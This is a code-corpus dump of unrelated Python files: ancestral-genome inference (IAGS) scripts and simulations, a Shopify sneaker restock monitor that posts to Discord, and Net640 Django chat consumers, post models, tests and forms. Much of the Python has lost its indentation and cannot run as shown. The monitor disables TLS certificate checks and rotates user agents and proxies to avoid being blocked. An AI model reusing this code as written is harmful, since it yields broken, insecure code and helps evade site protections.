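    "ancestor.matrix.xls",              # ancestral endpoint adjacency matrix
    "guided.block",                     # guided species block sequence
    matching_dim1=4, matching_dim2=2,   # copy numbers being matched
    relation1=1, relation2=2,
    relabel=True)                       # relabel guided blocks with copy indices
emo.optimization()                          # solve the matching ILP
emo.matching_relation()                     # extract the 0/1 assignment
emo.output_matching_relation("matching.txt")
adjacency_matrix = emo.build_adjacency_matrix()
adjacency_matrix.output("ancestor.relabeled.matrix.xls")
```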
#### File: IAGS_version1.0/models/GMPmodel.py
```python
from util.transformToAdjacency import transformToAdjacency
from inferringAncestorGenomeStructure.GMP import GMP
def GMPmodel(species_file_list, outdir, ancestor_name):
"""
    The GMP model takes several species block sequence files
    and transforms each block sequence into block adjacencies.
    IAGS then applies the GMP integer programming formulation
    to these block adjacencies to obtain the ancestral block adjacencies,
    which are assembled directly into the ancestral block sequence.
:param species_file_list: input species block sequence file list.
:param outdir: output directory
:param ancestor_name: ancestor name
"""
adj_file = outdir + ancestor_name + '.adj'
# transform to adjacencies
transformToAdjacency(species_file_list, adj_file)
output_matrix_file = outdir + ancestor_name + '.matrix.xls'
# GMP integer programming
gmp = GMP(adj_file,
target_copy_number=1)
gmp.optimization()
adjacency_matrix = gmp.ancestor_adjacency_matrix()
adjacency_matrix.output(output_matrix_file)
# block sequence
adjacency_matrix.assemble()
adjacency_matrix.out_assembly(outdir + ancestor_name + '.block', remove_bar=False)
```
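A minimal usage sketch of GMPmodel(); the species block files and the output directory are placeholders. Note that outdir is concatenated with the ancestor name inside the function, so it should end with a path separator.
```python
# Usage sketch for GMPmodel (paths are placeholders).
from models.GMPmodel import GMPmodel

species_file_list = [
    "inputdata/speciesA.block",
    "inputdata/speciesB.block",
    "inputdata/speciesC.block",
]
# Produces <outdir>/Ancestor.adj, Ancestor.matrix.xls and Ancestor.block
GMPmodel(species_file_list, outdir="outputdata/", ancestor_name="Ancestor")
```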
#### File: IAGS_version1.0/run_script/run_MultiGMP.py
```python
import sys
import os
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(rootPath)
import argparse
from models.MultiGMPmodel import MultiCopyGMPmodel
def main():
"""
Inferring ancestor species with MultiGMP model
"""
parser = argparse.ArgumentParser(description="IAGS MultiGMP")
parser.add_argument("-c", "--config_file")
args = parser.parse_args()
config_file = args.config_file
species_block_filelist = []
ancestor_name = ''
guided_species_for_matching = ''
ancestor_target_copy_number = ''
outdir = ''
with open(config_file,'r') as cf:
while True:
line = cf.readline()[:-1]
if not line:
break
if line.startswith('Species:'):
while True:
line = cf.readline()[:-1]
if line.startswith('End'):
break
species_block_filelist.append(line)
elif line.startswith('GuidedSpecies:'):
line = cf.readline()[:-1]
guided_species_for_matching = line
elif line.startswith('Outdir:'):
line = cf.readline()[:-1]
outdir = line
elif line.startswith('AncestorName:'):
line = cf.readline()[:-1]
ancestor_name = line
elif line.startswith('AncestorCopyNumber:'):
line = cf.readline()[:-1]
ancestor_target_copy_number = int(line)
else:
print('Error')
return
MultiCopyGMPmodel(species_block_filelist, outdir,
guided_species_for_matching, ancestor_name,
ancestor_target_copy_number)
if __name__ == '__main__':
main()
```
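The config parser above expects one keyword per line with its value on the following line, the species list terminated by an End line, and no blank lines. A hedged example configuration, written from Python so the exact layout is explicit (all paths are placeholders):
```python
# Writes a config file in the layout expected by run_MultiGMP.py (paths are placeholders).
config_text = """Species:
inputdata/speciesA.block
inputdata/speciesB.block
inputdata/speciesC.block
End
GuidedSpecies:
inputdata/speciesA.block
Outdir:
outputdata/
AncestorName:
Ancestor1
AncestorCopyNumber:
2
"""
with open("multigmp.config", "w") as cf:
    cf.write(config_text)
# python run_script/run_MultiGMP.py -c multigmp.config
```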
#### File: IAGS_version1.0/scenarios/Papaver.py
```python
from models.MultiGMPmodel import MultiCopyGMPmodel
from models.MultiGGHPmodel import MultiCopyGGHPmodel
from models.GGHPmodel import GGHPmodel
from util.calculatedCRBrateAndEstimationAccuracy import calculatedCRBrateAndEstimationAccuracy
"""
Inferring ancestor species for Papaver species.
Ancestor 3: Multi-copy GGHP model, result in outdutdata/Papaver/Ancestor3
Ancestor 1: GGHP model, result in outdutdata/Papaver/Ancestor1
Ancestor 2: Multi-copy GMP model, Ancestor1 should be doubled,result in outdutdata/Papaver/Ancestor2
"""
def doubled(infile,outfile):
"""
Used for doubled species block sequence.
:param infile: block sequence file
:param outfile: block sequence file
"""
outfile = open(outfile,'w')
sequence = []
with open(infile,'r') as f:
while True:
line = f.readline()
if not line:
break
sequence.append(line)
for i in sequence:
outfile.write(i)
for i in sequence:
outfile.write(i)
path = 'D:/InferAncestorGenome/realData'
workdir = path + '/IAGS_version1.0/inputdata/Papaver/'
"""
Inferring ancestor species for Papaver species.
Ancestor 3 using Multi-copy GGHP model
"""
dup_child_file = workdir + 'Psetigerum.final.block'
outgroup_file = workdir + 'Psomniferum.final.block'
outAncestor3dir = path + '/IAGS_version1.0/outputdata/Papaver/Ancestor3/'
dup_copy_number = 4
out_copy_number = 2
ancestor_target_copy_number = 2
ancestor_name = 'Ancestor3'
MultiCopyGGHPmodel(dup_child_file, outgroup_file, outAncestor3dir,
ancestor_name, dup_copy_number, out_copy_number,
ancestor_target_copy_number)
# Evaluation
matching_target_file = workdir + 'Psomniferum.final.block'
matching_target_copy_number = out_copy_number
matching_target_name = 'P.somniferum'
speciesAndCopyList = [
[workdir + 'Psetigerum.final.block',dup_copy_number,'P.setigerum'],
[workdir + 'Psomniferum.final.block',out_copy_number,'P.somniferum']
]
model_type = 'MultiCopyGGHP'
calculatedCRBrateAndEstimationAccuracy(matching_target_file, matching_target_copy_number, matching_target_name,
speciesAndCopyList, outAncestor3dir, model_type)
"""
Inferring ancestor species for Papaver species.
Ancestor 1 using GGHP model
"""
dup_child_file = workdir + 'Psomniferum.final.block'
outgroup_file = workdir + 'Prhoeas.final.block'
outAncestor1dir = path + '/IAGS_version1.0/outputdata/Papaver/Ancestor1/'
dup_copy_number = 2
out_copy_number = 1
ancestor_name = 'Ancestor1'
GGHPmodel(dup_child_file=dup_child_file,
outgroup_file=outgroup_file,
outdir=outAncestor1dir,
ancestor_name=ancestor_name,
dup_copy_number=dup_copy_number,
out_copy_number=out_copy_number)
# Evaluation
matching_target_file = workdir + 'Prhoeas.final.block'
matching_target_copy_number = out_copy_number
matching_target_name = 'P.rhoeas'
ancestor_copy_number = 1
speciesAndCopyList = [
[workdir + 'Psomniferum.final.block',dup_copy_number,'P.somniferum'],
[workdir + 'Prhoeas.final.block',out_copy_number,'P.rhoeas']
]
model_type = 'GGHP'
calculatedCRBrateAndEstimationAccuracy(matching_target_file, matching_target_copy_number, matching_target_name,
speciesAndCopyList, outAncestor1dir, model_type)
"""
Inferring ancestor species for Papaver species.
Ancestor 2 using Multi-copy GMP model
"""
doubled(outAncestor1dir + 'Ancestor1.block',outAncestor1dir + 'Ancestor1.doubled.block')
species_file_list = [workdir + 'Psomniferum.final.block',
outAncestor3dir + 'Ancestor3.block',
outAncestor1dir + 'Ancestor1.doubled.block']
guided_species_for_matching = workdir + 'Psomniferum.final.block'
outAncestor2dir = path + '/IAGS_version1.0/outputdata/Papaver/Ancestor2/'
ancestor_target_copy_number = 2
ancestor_name = 'Ancestor2'
MultiCopyGMPmodel(species_file_list, outAncestor2dir, guided_species_for_matching,
ancestor_name, ancestor_target_copy_number)
# Evaluation
matching_target_file = workdir + 'Psomniferum.final.block'
matching_target_copy_number = ancestor_target_copy_number
matching_target_name = 'P.somniferum'
speciesAndCopyList = [
[workdir + 'Psomniferum.final.block',ancestor_target_copy_number,'P.somniferum'],
[outAncestor3dir + 'Ancestor3.block',ancestor_target_copy_number,'Ancestor3'],
[outAncestor1dir + 'Ancestor1.doubled.block',ancestor_target_copy_number,'Ancestor1.doubled']
]
model_type = 'MultiCopyGMP'
calculatedCRBrateAndEstimationAccuracy(matching_target_file, matching_target_copy_number, matching_target_name,
speciesAndCopyList, outAncestor2dir, model_type)
```
#### File: simulations/CRBs/MultiGGHPsimulations.py
```python
import pandas as pd
import copy
import numpy as np
import random
def outSequence(sequence,outfile):
outfile = open(outfile,'w')
for i in sequence:
for j in i:
outfile.write(j+' ')
outfile.write('\n')
outfile.close()
def sequence2adjacency(sequence):
adjacency = []
for i in sequence:
block = i[0]
if block.startswith('-'):
adjacency.append(['$',block[1:] + 'b'])
start = block[1:] + 'a'
else:
adjacency.append(['$', block + 'a'])
start = block + 'b'
for j in range(len(i)-1):
block = i[j+1]
if block.startswith('-'):
adjacency.append([start, block[1:] + 'b'])
start = block[1:] + 'a'
else:
adjacency.append([start, block + 'a'])
start = block + 'b'
adjacency.append([start,'$'])
return adjacency
def reverse(item):
if item[-1] == 'a':
return item[:-1] + 'b'
else:
return item[:-1] + 'a'
def assemble(adjacency_list):
# assemble adjacencies to sequence
matrix_items = []
for i in adjacency_list:
for j in i:
if j not in matrix_items:
matrix_items.append(j)
matrix_items = sorted(matrix_items)
adjacency_matrix = {}
for i in matrix_items:
adjacency_matrix[i] = {}
for j in matrix_items:
adjacency_matrix[i][j] = 0
for i in adjacency_list:
adjacency_matrix[i[0]][i[1]] = 1
adjacency_matrix[i[1]][i[0]] = 1
adjacency_matrix = pd.DataFrame(adjacency_matrix)
index = adjacency_matrix.index.tolist()
columns = adjacency_matrix.columns.tolist()
np_adjacency_matrix = np.asarray(adjacency_matrix)
adjacencies = {}
for i in range(len(index)):
for j in range(len(index)):
if int(np_adjacency_matrix[i][j]) == 1:
if '$' == index[i] or '$' == index[j]:
continue
pair = sorted([index[i], index[j]])
key = pair[0] + '@' + pair[1]
if key not in adjacencies.keys():
adjacencies[key] = 1
else:
adjacencies[key] += 1
adjs = {}
for i in adjacencies.keys():
itemset = i.split('@')
if itemset[0] not in adjs.keys():
adjs[itemset[0]] = itemset[1]
if itemset[1] not in adjs.keys():
adjs[itemset[1]] = itemset[0]
startpoint = []
for j in range(len(columns)):
if np_adjacency_matrix[0][j] == 1:
startpoint.append(columns[j])
markerstartpoint = []
chr = []
for i in startpoint:
if i not in markerstartpoint:
path = []
if i[-1] == 'a':
path.append(i[:-1])
else:
path.append('-' + i[:-1])
start = reverse(i)
if start in startpoint:
markerstartpoint.append(start)
chr.append(path)
else:
while True:
next = adjs[start]
if next[-1] == 'a':
path.append(next[:-1])
else:
path.append('-' + next[:-1])
start = reverse(next)
if start in startpoint:
markerstartpoint.append(start)
break
chr.append(path)
vector = []
for i in chr:
for j in i:
if j.startswith('-'):
vector.append(j[1:])
else:
vector.append(j)
cyclepoint = []
for i in adjs.keys():
if i[:-1] not in vector:
cyclepoint.append(i)
cyclechr = []
markercycle = []
for i in cyclepoint:
if i not in markercycle:
startpoint = i
cycle = []
markercycle.append(i)
start = i
while True:
next = adjs[start]
if next[-1] == 'a':
cycle.append(next[:-1])
else:
cycle.append('-' + next[:-1])
markercycle.append(start)
markercycle.append(next)
start = reverse(next)
if start == startpoint:
break
cyclechr.append(cycle)
return chr,cyclechr
def changeAdj(adj_list):
change = copy.deepcopy(adj_list)
endpoints = []
for j in change:
for k in j:
endpoints.append(k)
random.shuffle(endpoints)
change_part = []
for j in range(int(len(endpoints) / 2)):
change_part.append([endpoints[j * 2], endpoints[2 * j + 1]])
return change_part
def readSequence(file):
chr = []
with open(file,'r') as rf:
while True:
line = rf.readline()[:-2]
if not line:
break
itemset = line.split(' ')
header = itemset[0]
new_itemset = [header]
for i in itemset[1:]:
item = i.split('_')
new_itemset.append(item[0])
chr.append(new_itemset)
return chr
def buildSimulatedMultiGGHP_CRBs(adjacencises, save_final_species_adjacencies, change_adjacency_number, divergence_level, current_level):
random.shuffle(adjacencises)
sp1 = copy.deepcopy(adjacencises)
sp1_change = copy.deepcopy(sp1[:change_adjacency_number])
sp1_change = changeAdj(sp1_change)
sp1_unchange = copy.deepcopy(sp1[change_adjacency_number:])
new_sp1 = sp1_change + sp1_unchange
save_final_species_adjacencies.append(new_sp1)
random.shuffle(adjacencises)
sp2 = copy.deepcopy(adjacencises)
sp2_change = copy.deepcopy(sp2[:change_adjacency_number])
sp2_change = changeAdj(sp2_change)
sp2_unchange = copy.deepcopy(sp2[change_adjacency_number:])
new_sp2 = sp2_change + sp2_unchange
save_final_species_adjacencies.append(new_sp2)
# duplication
sp2_dup = []
for i in new_sp2:
if i[0] == '$':
newendpoint1 = '$'
newendpoint2 = '$'
else:
newendpoint1 = i[0][:-1]+'_1'+i[0][-1]
newendpoint2 = i[0][:-1] + '_2' + i[0][-1]
if i[1] == '$':
newendpoint3 = '$'
newendpoint4 = '$'
else:
newendpoint3 = i[1][:-1]+'_1'+i[1][-1]
newendpoint4 = i[1][:-1] + '_2' + i[1][-1]
sp2_dup.append([newendpoint1,newendpoint3])
sp2_dup.append([newendpoint2, newendpoint4])
random.shuffle(sp2_dup)
sp3 = copy.deepcopy(sp2_dup)
sp3_change = copy.deepcopy(sp3[:change_adjacency_number * 2])
sp3_change = changeAdj(sp3_change)
sp3_unchange = copy.deepcopy(sp3[change_adjacency_number * 2:])
new_sp3 = sp3_change + sp3_unchange
if current_level == divergence_level:
save_final_species_adjacencies.append(new_sp3)
else:
save_final_species_adjacencies.append(new_sp3)
buildSimulatedMultiGGHP_CRBs(new_sp3, save_final_species_adjacencies, change_adjacency_number * 2,
divergence_level, current_level + 1)
# simulate with some changed adjacencies in each species
def simulateMultiGGHP_CRBs(outdir, change_adjacency_number):
ancestor_sequence_file = outdir + 'ancestor.sequence'
chromosome_number = 5
block_number = 50
ancestor_sequence = []
one_chromosome = int(block_number / chromosome_number)
block = 100
for i in range(chromosome_number):
sequence = []
for j in range(one_chromosome):
if block % 2 == 0:
sequence.append('-' + str(block)+'_1')
else:
sequence.append(str(block)+'_1')
block += 1
ancestor_sequence.append(sequence)
# outSequence(ancestor_sequence, ancestor_sequence_file)
ancestor_adjacency = sequence2adjacency(ancestor_sequence)
random.shuffle(ancestor_adjacency)
print(len(ancestor_adjacency))
divergence_level = 1
save_final_species_adjacencies = []
buildSimulatedMultiGGHP_CRBs(ancestor_adjacency, save_final_species_adjacencies, change_adjacency_number, divergence_level, current_level=0)
species_count = 1
for i in save_final_species_adjacencies:
print('-----')
outfile = outdir + 'species.sequence.' + str(species_count)
outfile = open(outfile,'w')
filter_tel2tel = []
for j in i:
# filter ($,$)
if j[0] == '$' and j[1] == '$':
continue
else:
filter_tel2tel.append([j[0], j[1]])
chrs,cycles = assemble(filter_tel2tel)
print('chr')
for j in chrs:
print(j)
outfile.write('s ')
for k in j:
outfile.write(k+' ')
outfile.write('\n')
print('cycle')
for j in cycles:
print(j)
outfile.write('c ')
min_index = -1
min_value = 1000000
for k in range(len(j)):
if j[k].startswith('-'):
item = j[k][1:].split('_')
block = int(item[0])
else:
item = j[k].split('_')
block = int(item[0])
if block < min_value:
min_index = k
min_value = block
if j[min_index].startswith('-'):
half1 = j[min_index + 1:]
half2 = j[:min_index + 1]
new_string = half1 + half2
else:
half1 = j[min_index:]
half2 = j[:min_index]
new_string = half1 + half2
for k in new_string:
outfile.write(k+' ')
outfile.write('\n')
outfile.close()
species_count += 1
``` |
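A short usage sketch for the simulation entry point above; the output directory is a placeholder and must exist beforehand, since simulateMultiGGHP_CRBs() writes one species.sequence.&lt;i&gt; file per simulated genome into it.
```python
# Usage sketch for simulateMultiGGHP_CRBs (output directory is a placeholder).
import os
from simulations.CRBs.MultiGGHPsimulations import simulateMultiGGHP_CRBs

outdir = "simulated_CRBs/"
os.makedirs(outdir, exist_ok=True)
# Introduce 5 rearranged adjacencies per divergence step and write the
# resulting species.sequence.<i> files into outdir.
simulateMultiGGHP_CRBs(outdir, change_adjacency_number=5)
```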
{
"source": "869903437/Sneaker-Monitors",
"score": 2
} |
#### File: Sneaker-Monitors/Shopify/ShopifyMonitor.py
```python
import requests as rq
import json
import time
from datetime import datetime
import urllib3
import logging
import dotenv
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, HardwareType
logging.basicConfig(filename='Shopifylog.log', filemode='a', format='%(asctime)s - %(name)s - %(message)s',
level=logging.DEBUG)
software_names = [SoftwareName.CHROME.value]
hardware_type = [HardwareType.MOBILE__PHONE]
user_agent_rotator = UserAgent(software_names=software_names, hardware_type=hardware_type)
CONFIG = dotenv.dotenv_values()
INSTOCK = []
def check_url(url):
"""
Checks whether the supplied URL is valid
:return: Boolean - True if valid
"""
return 'products.json' in url
def scrape_site(url, headers, proxy):
"""
Scrapes the specified Shopify site and adds items to array
:return: None
"""
items = []
s = rq.Session()
page = 1
while True:
try:
html = s.get(url + f'?page={page}&limit=250', headers=headers, proxies=proxy, verify=False, timeout=20)
output = json.loads(html.text)['products']
if output == []:
break
else:
for product in output:
product_item = [
{'title': product['title'], 'image': product['images'][0]['src'], 'handle': product['handle'],
'variants': product['variants']}]
items.append(product_item)
logging.info(msg='Successfully scraped site')
page += 1
except Exception as e:
logging.error(e)
break
time.sleep(float(CONFIG['DELAY']))
s.close()
return items
def checker(handle):
"""
Determines whether the product status has changed
"""
for item in INSTOCK:
if item == handle:
return True
return False
def discord_webhook(product_item):
"""
Sends a Discord webhook notification to the specified webhook URL
    :param product_item: An array containing the product name, the product sizes in stock and the thumbnail URL
:return: None
"""
description = ''
if product_item[0] == 'initial':
description = "Thank you for using Yasser's Sneaker Monitors. This message is to let you know that " \
"everything is working fine! You can find more monitoring solutions at " \
"https://github.com/yasserqureshi1/Sneaker-Monitors "
else:
fields = []
for size in product_item[1][0]:
fields.append({'name': size, 'value': 'Available', 'inline': True})
link = CONFIG['URL'].replace('.json', '/') + product_item[3]
data = {}
data["username"] = CONFIG['USERNAME']
data["avatar_url"] = CONFIG['AVATAR_URL']
data["embeds"] = []
embed = {}
if product_item[0] != 'initial':
embed["title"] = product_item[0]
embed['url'] = link
embed["thumbnail"] = {'url': product_item[2]}
embed["fields"] = fields
else:
embed["description"] = description
embed["color"] = int(CONFIG['COLOUR'])
embed["footer"] = {'text': 'Made by <NAME>'}
embed["timestamp"] = str(datetime.utcnow())
data["embeds"].append(embed)
result = rq.post(CONFIG['WEBHOOK'], data=json.dumps(data), headers={"Content-Type": "application/json"})
try:
result.raise_for_status()
except rq.exceptions.HTTPError as err:
logging.error(err)
else:
print("Payload delivered successfully, code {}.".format(result.status_code))
logging.info(msg="Payload delivered successfully, code {}.".format(result.status_code))
def remove_duplicates(mylist):
"""
Removes duplicate values from a list
:param mylist: list
:return: list
"""
return list(set(mylist))
def comparitor(product, start):
product_item = [product[0]['title'], [], product[0]['image'], product[0]['handle']]
available_sizes = []
for size in product[0]['variants']:
if size['available']:
available_sizes.append(size['title'])
if available_sizes:
if checker(product[0]['handle']):
pass
else:
INSTOCK.append(product[0]['handle'])
product_item[1].append(available_sizes)
else:
if checker(product[0]['handle']):
INSTOCK.remove(product[0]['handle'])
if not product_item[1]:
pass
else:
if start == 0:
print(product_item)
discord_webhook(product_item)
logging.info(msg='Successfully sent Discord notification')
def monitor():
"""
Initiates the monitor
:return: None
"""
print('STARTING MONITOR')
logging.info(msg='Successfully started monitor')
if not check_url(CONFIG['URL']):
print('Store URL not in correct format. Please ensure that it is a path pointing to a /products.json file')
logging.error(msg='Store URL formatting incorrect for: ' + str(CONFIG['URL']))
return
discord_webhook(['initial'])
start = 1
proxy_no = 0
proxy_list = CONFIG['PROXY'].split('%')
proxy = {} if proxy_list[0] == "" else {"http": f"http://{proxy_list[proxy_no]}"}
headers = {'User-Agent': user_agent_rotator.get_random_user_agent()}
keywords = CONFIG['KEYWORDS'].split('%')
while True:
try:
            items = scrape_site(CONFIG['URL'], headers, proxy)
for product in items:
check = False
if keywords == "":
comparitor(product, start)
else:
for key in keywords:
if key.lower() in product[0]['title'].lower():
check = True
break
if check:
comparitor(product, start)
except Exception as e:
print(e)
logging.error(e)
headers = {'User-Agent': user_agent_rotator.get_random_user_agent()}
if proxy != {}:
proxy_no = 0 if proxy_no == (len(proxy_list) - 1) else proxy_no + 1
proxy = {"http": f"http://{proxy_list[proxy_no]}"}
start = 0
time.sleep(float(CONFIG['DELAY']))
if __name__ == '__main__':
urllib3.disable_warnings()
monitor()
``` |
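The monitor reads all of its settings from a .env file via python-dotenv; the keys below are exactly those accessed through CONFIG[...] above, while every value is a placeholder. PROXY and KEYWORDS are %-separated lists and may be left empty.
```python
# Example .env for ShopifyMonitor.py; keys match the CONFIG[...] accesses above,
# all values are placeholders.
example_env = """URL=https://examplestore.com/products.json
WEBHOOK=https://discord.com/api/webhooks/<id>/<token>
USERNAME=SneakerMonitor
AVATAR_URL=https://example.com/avatar.png
COLOUR=5793266
DELAY=10
PROXY=
KEYWORDS=dunk%jordan%yeezy
"""
with open(".env", "w") as f:
    f.write(example_env)
```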
{
"source": "86Ilya/net640kb",
"score": 3
} |
#### File: apps/chat/consumers.py
```python
import json
from channels.generic.websocket import AsyncWebsocketConsumer, AsyncJsonWebsocketConsumer
from Net640.apps.chat.models import Message
from Net640.errors import NotEnoughSpace
class ChatConsumer(AsyncWebsocketConsumer):
"""
Class-consumer, which will accept WebSocket connections and
process ws messages.
"""
async def connect(self):
self.user = self.scope['user']
if not self.user.is_authenticated:
raise Exception("user is not authenticated")
self.room_name = self.scope['url_route']['kwargs']['room_name']
self.room_group_name = 'chat_{}'.format(self.room_name)
# Join room group
await self.channel_layer.group_add(
self.room_group_name,
self.channel_name
)
await self.accept()
async def disconnect(self, close_code):
# Leave room group
await self.channel_layer.group_discard(
self.room_group_name,
self.channel_name
)
# Receive message from WebSocket
async def receive(self, text_data):
text_data_json = json.loads(text_data)
content = text_data_json['message']
response = None
# Save message to database
chat_message = Message(author=self.user, chat_room=self.room_name, content=content)
try:
chat_message.save()
response = {
'content': chat_message.content,
'timestamp': chat_message.formatted_timestamp,
'author': chat_message.author.username,
'message_id': chat_message.id,
}
except NotEnoughSpace:
            # TODO send notification via update_flow
return
else:
# Send message to room group
await self.channel_layer.group_send(self.room_group_name, {'type': 'chat_message', 'message': response})
# Receive message from room group
async def chat_message(self, event):
message = event['message']
# Send message to WebSocket
await self.send(text_data=json.dumps({
'message': message,
}))
class EventConsumer(AsyncJsonWebsocketConsumer):
async def connect(self):
self.room_name = str(self.scope['user'].id) + '_update_flow'
await self.channel_layer.group_add(
self.room_name,
self.channel_name
)
await self.accept()
async def disconnect(self, close_code):
# TODO print -> logging
await self.channel_layer.group_discard(
self.room_name,
self.channel_name
)
async def receive_json(self, content, **kwargs):
await self.send_json(content)
async def update_flow(self, event):
await self.send_json(
{
'type': 'update_flow',
'message': event['message']
}
)
```
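The consumers above read room_name from scope['url_route'], so they must be mounted in a Channels URL router. The sketch below is a hypothetical routing module assuming Channels 3 (hence .as_asgi()); the project's actual routing file is not shown here.
```python
# Hypothetical Channels routing for the chat consumers above (assumes Channels 3+).
from django.urls import re_path
from Net640.apps.chat.consumers import ChatConsumer, EventConsumer

websocket_urlpatterns = [
    # room_name ends up in scope['url_route']['kwargs']['room_name']
    re_path(r'^ws/chat/(?P<room_name>\w+)/$', ChatConsumer.as_asgi()),
    re_path(r'^ws/events/$', EventConsumer.as_asgi()),
]
```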
#### File: apps/updateflow/consumers.py
```python
from channels.generic.websocket import AsyncJsonWebsocketConsumer
from Net640.apps.updateflow.helpers import get_updateflow_room_name
class EventConsumer(AsyncJsonWebsocketConsumer):
async def connect(self):
self.user = self.scope['user']
if not self.user.is_authenticated:
raise Exception("user is not authenticated")
self.room_name = get_updateflow_room_name(self.scope['user'].id)
await self.channel_layer.group_add(
self.room_name,
self.channel_name
)
await self.accept()
async def disconnect(self, close_code):
await self.channel_layer.group_discard(
self.room_name,
self.channel_name
)
async def receive_json(self, content, **kwargs):
await self.send_json(content)
async def update_flow(self, event):
await self.send_json(
{
'type': 'update_flow',
'message': event['message']
}
)
```
#### File: apps/user_posts/mixin.py
```python
from django.urls import reverse
from Net640.settings import FRONTEND_DATE_FORMAT
class AsDictMessageMixin:
"""
Mixin for representing user messages(post, comments) as dictionaries
"""
def as_dict(self, executor):
return {'content': self.content,
'user_has_like': self.has_like(executor),
'is_owner': self.user == executor,
'rating': round(self.get_rating(), 1),
'author': self.user.username,
'author_page': reverse('friends:user_view', kwargs={'user_id': self.user.id}),
'date': self.date.strftime(FRONTEND_DATE_FORMAT),
'id': self.id,
'author_thumbnail_url': self.user.get_thumbnail_url(), }
```
#### File: apps/user_posts/models.py
```python
import os
import logging
from django.db import models
from django.conf import settings
from django.utils import timezone
from Net640.apps.images.models import user_directory_path
from Net640.mixin import LikesMixin
from Net640.apps.user_posts.mixin import AsDictMessageMixin
from Net640.apps.user_posts.exceptions import PostException
class Post(LikesMixin, AsDictMessageMixin, models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
content = models.TextField()
date = models.DateTimeField(default=timezone.now, blank=True)
image = models.ImageField(upload_to=user_directory_path)
image_size = models.IntegerField(default=0)
likes = models.ManyToManyField(settings.AUTH_USER_MODEL, default=None, related_name="post_likes")
class Meta:
ordering = ["-date"]
app_label = 'user_posts'
def get_image_url(self):
if self.image:
return self.image.url
def get_size(self):
""" calculate post size """
# TODO Currently, this method calculates the size approximately. Need to calculate likes.
try:
post_size = 0
post_size += len(str(self.id))
post_size += len(str(self.user.id))
post_size += len(self.content)
post_size += len(str(self.user_id))
post_size += len(str(self.date))
if self.image:
post_size += self.image.size
except Exception as error:
raise PostException("Got error when calculating post size {}".format(error))
return post_size
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
try:
post_size = self.get_size()
if post_size:
# send increment info
self.user.msg_upd_page_size(post_size)
except PostException as error:
logging.error(error)
def delete(self, *args, **kwargs):
try:
post_size = self.get_size()
if post_size:
# send decrement info
self.user.msg_upd_page_size(-post_size)
except PostException as error:
logging.error(error)
finally:
super().delete(*args, **kwargs)
if self.image:
os.remove(self.image.path)
def as_dict(self, executor):
result = super().as_dict(executor)
result.update({'comments': [comment.as_dict(executor) for comment in Comment.objects.filter(post=self)],
'image_url': self.get_image_url()})
return result
class Comment(LikesMixin, AsDictMessageMixin, models.Model):
"""
Comment model for user post
"""
content = models.TextField()
post = models.ForeignKey(Post, on_delete=models.CASCADE)
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
date = models.DateTimeField(default=timezone.now)
likes = models.ManyToManyField(settings.AUTH_USER_MODEL, default=None, related_name="comment_likes")
class Meta:
ordering = ['-date']
app_label = 'user_posts'
```
#### File: user_posts/tests/test_forms.py
```python
from uuid import uuid1
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from Net640.apps.user_posts.forms import PostForm
from Net640.apps.user_profile.models import User
from Net640.testing.helpers import create_test_image
class TestUserPostForm(TestCase):
def setUp(self):
random_name = str(uuid1())
self.user = User(username=random_name, email=random_name + '@m.ru')
self.user.save()
def test_create_correct_post_by_form(self):
user_post_form_data = {'content': 'test content'}
user_post_form = PostForm(user_post_form_data, user=self.user)
self.assertTrue(user_post_form.is_valid())
def test_create_correct_post_by_form_with_image(self):
img_file, content_type = create_test_image()
img_dict = {'image': SimpleUploadedFile('myimage.bmp', img_file.read(), content_type)}
user_post_form_data = {'content': 'test content'}
user_post_form = PostForm(user_post_form_data, img_dict, user=self.user)
self.assertTrue(user_post_form.is_valid())
def test_create_incorrect_anonymous_post_by_form(self):
user_post_form_data = {'content': 'test content'}
user_post_form = PostForm(user_post_form_data)
self.assertFalse(user_post_form.is_valid())
self.assertEqual(user_post_form.errors['__all__'][0], 'Anonymous posts are not allowed')
def test_create_incorrect_oversized_post_by_form(self):
img_file, content_type = create_test_image(1000)
img_dict = {'image': SimpleUploadedFile('myimage.bmp', img_file.read(), content_type)}
user_post_form_data = {'content': 'test content'}
user_post_form = PostForm(user_post_form_data, img_dict, user=self.user)
self.assertFalse(user_post_form.is_valid())
self.assertEqual(user_post_form.errors['__all__'][0], 'Not enough space!')
```
#### File: apps/user_profile/forms.py
```python
from django import forms
from django.contrib.auth.hashers import make_password
from django.contrib.auth.forms import PasswordResetForm
from django.core.validators import RegexValidator
from django.core.exceptions import ObjectDoesNotExist
from django.utils.translation import ugettext_lazy as _
from Net640.apps.user_profile.models import User
from Net640.settings import MAX_PAGE_SIZE, DATE_FORMAT
from Net640.errors import ERR_EXCEED_LIMIT
username_validator = RegexValidator(r'^[\w\d_\-]+$',
"Username should contain only letters, digits, underscores, and dashes")
class CleanPasswordMixin:
def _clean_password(self, cleaned_data):
password = cleaned_data['password']
password_again = cleaned_data['password_again']
validation_errors = list()
if len(password) == 0 and len(password_again) == 0:
return cleaned_data, validation_errors
if password != password_again:
validation_errors.append(forms.ValidationError("Passwords mismatch"))
elif len(password) < 8:
validation_errors.append(forms.ValidationError("Password length must be at least 8 symbols"))
return cleaned_data, validation_errors
class UserForm(CleanPasswordMixin, forms.ModelForm):
username = forms.CharField(widget=forms.TextInput, max_length=120, min_length=3, validators=[username_validator])
email = forms.EmailField(widget=forms.EmailInput)
password = forms.CharField(widget=forms.PasswordInput)
password_again = forms.CharField(widget=forms.PasswordInput)
avatar = forms.ImageField(widget=forms.FileInput)
class Meta:
model = User
fields = ('username', 'email', 'password', 'password_again', 'avatar')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['avatar'].required = False
self.fields['avatar'].label = 'Upload Avatar:'
self.fields['avatar'].widget.attrs.update({
'class': 'form-control-file'
})
if self.fields.get('username', None):
self.fields['username'].widget.attrs.update({
'placeholder': 'Username', 'class': 'form-control mb-3'
})
self.fields['username'].help_text = ''
self.fields['username'].label = ''
self.fields['email'].widget.attrs.update({
'placeholder': 'Email', 'class': 'form-control mb-3'
})
self.fields['email'].help_text = ''
self.fields['email'].label = ''
self.fields['password'].widget.attrs.update({
'placeholder': 'Password', 'class': 'form-control mb-3'
})
self.fields['password'].help_text = ''
